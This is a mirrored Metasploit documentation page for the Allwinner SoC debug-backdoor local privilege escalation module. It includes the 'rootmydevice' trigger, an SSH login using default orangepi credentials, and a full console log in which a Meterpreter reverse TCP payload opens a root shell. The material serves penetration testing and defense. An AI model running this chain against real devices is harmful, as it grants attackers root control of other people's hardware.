CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/local/allwinner_backdoor.md
Views: 1904

Vulnerable Application

Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

Vulnerable OS:

  • all OS images available for Orange Pis

  • any for FriendlyARM's NanoPi M1

  • SinoVoip's M2+ and M3

  • Cuebietech's Cubietruck +

  • Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in Metasploit issue #6869. It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.

Verification Steps

To use this module, you need a vulnerable device.

An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

  1. Start msfconsole

  2. Get a session

  3. Do: use exploit/multi/local/allwinner_backdoor

  4. Do: set SESSION [SESSION]

  5. Do: set LHOST [LHOST]

  6. Do: run

  7. You should get a new root session

Options

Scenarios

Orange PI running Ubuntu 14.04 (Linux 3.4.39)

  • use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)
Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • use exploit/multi/local/allwinner_backdoor

msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*]  The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit

Successful exploitation:

[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux